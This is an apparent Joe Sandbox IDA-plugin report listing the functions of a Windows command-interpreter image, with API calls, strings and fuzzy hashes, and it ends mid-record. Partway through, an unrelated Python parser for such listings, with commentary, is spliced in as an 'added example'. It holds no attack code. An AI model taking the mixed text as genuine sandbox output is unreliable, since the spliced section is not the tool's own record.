                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                              • String ID: %02d%s%02d%s%02d$%s $%s %s
                              • API String ID: 1795611712-4023967598
                              • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                              • Instruction ID: 00a7122d976a6dfdab02d3af5810ad778b63ba1105f0c3b544aed07b623874f4
                              • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                              • Instruction Fuzzy Hash: F0E18E21A0CA42C6EB10BF67A8855B9E6A1FB88784FD84131DE4E576DDDE3CE504A360
                              APIs
                                • Part of subcall function 00007FF744F13578: _get_osfhandle.MSVCRT ref: 00007FF744F13584
                                • Part of subcall function 00007FF744F13578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                                • Part of subcall function 00007FF744F13578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                                • Part of subcall function 00007FF744F13578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                                • Part of subcall function 00007FF744F13578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                                • Part of subcall function 00007FF744F13578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              • _get_osfhandle.MSVCRT ref: 00007FF744F032F3
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF744F032A4), ref: 00007FF744F03309
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF744F03384
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F211DF
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                              • String ID:
                              • API String ID: 611521582-0
                              • Opcode ID: eb4f65db57e5e21f7b3e544c495bce771b340a8d61a99cf5019a4a82effd2785
                              • Instruction ID: 7d0347e0f821baaf050b10e2ffad0585b0238758c56454e3d3d2112cf9cdec78
                              • Opcode Fuzzy Hash: eb4f65db57e5e21f7b3e544c495bce771b340a8d61a99cf5019a4a82effd2785
                              • Instruction Fuzzy Hash: 8EA18132B0C612CBF714BF62A8842BDEAA1FB89B55F895135CD0E467C8DF3C94459620
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                              • String ID: \\?\
                              • API String ID: 628682198-4282027825
                              • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                              • Instruction ID: 7d174f70306791720fd56abefa33272099d4dcb233ab988f4dc7361472fbd2b7
                              • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                              • Instruction Fuzzy Hash: B0E1A122A0CA82C6EB64BF22D9942F9A3A0FB85749F885135DE0E477D8DF3CE545D310
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                              • String ID:
                              • API String ID: 16309207-0
                              • Opcode ID: f69c8bc93ff962dccf6457547a30940781d29ec0e45bba8a393ad22f284f6631
                              • Instruction ID: 967de81567634408d014a5a230a0f4b4da27cebfc5ddd452dc647d934abd8111
                              • Opcode Fuzzy Hash: f69c8bc93ff962dccf6457547a30940781d29ec0e45bba8a393ad22f284f6631
                              • Instruction Fuzzy Hash: 8B228022B19B82C6EB25BF22D8942F9A3A0FB49784F884135DE0E077D9DF3DE5459310
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                              • String ID: $Application$System
                              • API String ID: 3538039442-1881496484
                              • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                              • Instruction ID: fb3304b0d049b738a2b2bc1478cf7d75c10707b42c61c608866b7f38550be3b3
                              • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                              • Instruction Fuzzy Hash: 72519832A0CB41D7EB20AF56B48427AFAA1FB89B45F898134EE4E03798DF3CD4459710
                              APIs
                              • longjmp.MSVCRT(?,?,00000000,00007FF744F2048E), ref: 00007FF744F2DA58
                              • memset.MSVCRT ref: 00007FF744F2DAD6
                              • memset.MSVCRT ref: 00007FF744F2DAFC
                              • memset.MSVCRT ref: 00007FF744F2DB22
                                • Part of subcall function 00007FF744F13A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F2EAC5,?,?,?,00007FF744F2E925,?,?,?,?,00007FF744F0B9B1), ref: 00007FF744F13A56
                                • Part of subcall function 00007FF744F05194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF744F051C4
                                • Part of subcall function 00007FF744F1823C: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F18280
                                • Part of subcall function 00007FF744F1823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F1829D
                                • Part of subcall function 00007FF744F101B8: _get_osfhandle.MSVCRT ref: 00007FF744F101C4
                                • Part of subcall function 00007FF744F101B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F101D6
                                • Part of subcall function 00007FF744F04FE8: _get_osfhandle.MSVCRT ref: 00007FF744F05012
                                • Part of subcall function 00007FF744F04FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F05030
                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F2DDB0
                                • Part of subcall function 00007FF744F059E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F05A2E
                                • Part of subcall function 00007FF744F059E4: _open_osfhandle.MSVCRT ref: 00007FF744F05A4F
                              • _get_osfhandle.MSVCRT ref: 00007FF744F2DDEB
                              • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F2DDFA
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F2E204
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F2E223
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F2E242
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                              • String ID: %9d$%s$~
                              • API String ID: 3651208239-912394897
                              • Opcode ID: e6d30ee1a680604acc51b567a64b2b57e279b7d93a42c24935efe64c52d79538
                              • Instruction ID: 3e27f4b70ef236add8ea0c6855c24bba6eed2f7780c44f84837dbe2c085cc78a
                              • Opcode Fuzzy Hash: e6d30ee1a680604acc51b567a64b2b57e279b7d93a42c24935efe64c52d79538
                              • Instruction Fuzzy Hash: DB426F32A0C682CAFB64BF2298901E9B7A1FB85744F980136DE4D47ADDDF3DE9409710
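The function records in this listing (call sites with their `ref:` addresses, indented "Part of subcall function" entries, the `$`-joined String ID, and the Opcode ID and fuzzy hashes that identify each function) are far easier to pivot on as structured data than as rendered text. The parser below is an added example and is not part of the Joe Sandbox report or its IDA plugin. It assumes the listing is available as plain text in the layout shown on this page (bullet-prefixed `Label: value` lines, `Name.Module(args), ref: ADDR` call entries, and an `Instruction Fuzzy Hash` line closing each record); its sample input is constructed from shortened copies of two records above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample (not copied from the report as-is): two shortened function
# records in the layout of the IDA-plugin listing on this page.
SAMPLE = """\
APIs
• longjmp.MSVCRT(?,?,00000000,00007FF744F2048E), ref: 00007FF744F2DA58
• memset.MSVCRT ref: 00007FF744F2DAD6
  • Part of subcall function 00007FF744F13A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F2EAC5), ref: 00007FF744F13A56
  • Part of subcall function 00007FF744F05194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF744F051C4
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F2DDB0
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F2E204
Strings
Memory Dump Source
• Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
Similarity
• API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
• String ID: %9d$%s$~
• Opcode ID: e6d30ee1a680604acc51b567a64b2b57e279b7d93a42c24935efe64c52d79538
• Instruction Fuzzy Hash: DB426F32A0C682CAFB64BF2298901E9B7A1FB85744F980136DE4D47ADDDF3DE9409710
APIs
• Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
• API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
• String ID: GOTO
• Opcode ID: e87969e6ebfccf29de2258abbc41600a6706c34826b1ed84fd1aaa5ba970b1f6
• Instruction Fuzzy Hash: 97E18B21A0D682C6FB64BF17A4D8379A6A0AF85750FCC4135DE0E462DDEF3CE845A721
"""

# "• Name.Module(args), ref: ADDR"; indented "Part of subcall" entries also
# carry the address of the sub-function that makes the call.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>\S+?)\.(?P<module>[A-Za-z0-9_.\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<label>[A-Za-z ]+?):\s?(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int            # call-site address
    caller: int | None  # sub-function address for "Part of subcall" entries
    args: list[str]


@dataclass
class FunctionRecord:
    image_base: int | None = None
    fields: dict[str, str] = field(default_factory=dict)
    apis: list[ApiCall] = field(default_factory=list)

    @property
    def opcode_id(self) -> str:
        return self.fields.get("Opcode ID", "")

    @property
    def strings(self) -> list[str]:
        # The plugin joins a function's referenced strings with "$".
        v = self.fields.get("String ID", "")
        return v.split("$") if v else []


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the listing into per-function records; a trailing record without its
    closing "Instruction Fuzzy Hash" line (a truncated page) is dropped."""
    records: list[FunctionRecord] = []
    cur = FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur.apis.append(ApiCall(
                name=m["name"], module=m["module"], ref=int(m["ref"], 16),
                caller=int(m["caller"], 16) if m["caller"] else None,
                args=m["args"].split(",") if m["args"] else [],
            ))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue  # bare section headers: APIs, Strings, Memory Dump Source, ...
        label, value = m["label"], m["value"].strip()
        if label == "Source File":
            off = re.search(r"Offset: ([0-9A-Fa-f]+)", value)
            cur.image_base = int(off[1], 16) if off else None
        else:
            cur.fields[label] = value
        if label == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    return records


def direct_calls(rec: FunctionRecord) -> list[ApiCall]:
    """APIs referenced by the function body itself, excluding listed sub-calls."""
    return [c for c in rec.apis if c.caller is None]


def watch_hits(records: list[FunctionRecord], watch: set[str]) -> dict[str, list[str]]:
    """Opcode ID -> sorted watched API names the function reaches, sub-calls included."""
    return {r.opcode_id: names for r in records
            if (names := sorted({c.name for c in r.apis if c.name in watch}))}
```

`parse_records` over a whole report gives one record per function; `watch_hits(records, {"VirtualAlloc", "CreateProcessW", "SetEndOfFile"})` then returns only the functions that reach those APIs, which is the usual first triage step over a dump this size. Intersecting the Opcode IDs of two reports is a cheap way to see which functions a second sample shares with this one; in this section every Opcode ID equals its Opcode Fuzzy Hash, so either field works as the key.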
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                              • String ID: GOTO
                              • API String ID: 3863671652-1693823284
                              • Opcode ID: e87969e6ebfccf29de2258abbc41600a6706c34826b1ed84fd1aaa5ba970b1f6
                              • Instruction ID: 6128ee3daa2622ea4e4e17231831ac76ea24a76756048577e2ab11b45cd01a36
                              • Opcode Fuzzy Hash: e87969e6ebfccf29de2258abbc41600a6706c34826b1ed84fd1aaa5ba970b1f6
                              • Instruction Fuzzy Hash: 97E18B21A0D682C6FB64BF17A4D8379A6A0AF85750FCC4135DE0E462DDEF3CE845A721
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                              • String ID: COPYCMD$\
                              • API String ID: 3989487059-1802776761
                              • Opcode ID: 96accb7c683da629c5902687fcfdce68ec2ad7ffcff5cd83664200e6c3670c7a
                              • Instruction ID: 2423bf0947e54e0e447656f296e11105eb886405a7c33302ab48210610a42a28
                              • Opcode Fuzzy Hash: 96accb7c683da629c5902687fcfdce68ec2ad7ffcff5cd83664200e6c3670c7a
                              • Instruction Fuzzy Hash: E4F1B466A0C746C2EB64BF1795842BAA3A1FF85B88F884135CE4E477D8EE3DE445D310
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                              • String ID:
                              • API String ID: 3935429995-0
                              • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                              • Instruction ID: cb51bb44a9ca32ddad11f678f595a0e95cf7b92bd1ee9cd79aad57f1cc0df176
                              • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                              • Instruction Fuzzy Hash: C461AD26A0C652C7E750FF22A58457AFBA4FB89F55F898134DE4A43798DF3CD401A710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Time$File$System$FormatInfoLocalLocale
                              • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                              • API String ID: 55602301-695310191
                              • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                              • Instruction ID: 7dde6f2d5a9dd0fd39fb38a2ea79c0409b202d777f4e787c1d088ec93709e775
                              • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                              • Instruction Fuzzy Hash: 5CA16D22A1C642D6FB10BF12E4802BAA7B5FB94754F980135EE5E436D8EF3CE944E710
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                              • Instruction ID: a94f878ba3252cfc79afc96fd8d4d9737a5a035d82f4768fec7cb432b4138c53
                              • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                              • Instruction Fuzzy Hash: F891F23260CA82C6EB24BF66D5902FDB6A0FB85746F884131DE4E467D8DF3DD544E220
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _get_osfhandlememset$wcschr
                              • String ID: DPATH
                              • API String ID: 3260997497-2010427443
                              • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                              • Instruction ID: a3cbf8519cde4e4ea3caa9446122dcc39e050c5ca6d0f57631b90ca20cad4cfd
                              • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                              • Instruction Fuzzy Hash: 5ED17E22A1C682C6EB25BF66D484179A3A1FB84B94F884235DE1D477DDDF3CE841E360
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                              • String ID: @P
                              • API String ID: 1801357106-3670739982
                              • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                              • Instruction ID: 44f063000f15a026af8b345ed095fe525cd04727a32d0ced4f90ea06543f8071
                              • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                              • Instruction Fuzzy Hash: 72414C33B08A45DFE710AF62D4802EDABB0FB89759F884231DE0D42A88DF78D548D760
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$BufferConsoleInfoScreen
                              • String ID:
                              • API String ID: 1034426908-0
                              • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                              • Instruction ID: 548b38d9f9e044807c3455d3ea48a80ef51f6f19f245c266fc9d95f397592a1e
                              • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                              • Instruction Fuzzy Hash: 33F16F32A0C682CAEB64FF2298942E9E7A5FF85744F884135DE4E476D9DF38E504D720
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorFileFindFirstLast
                              • String ID:
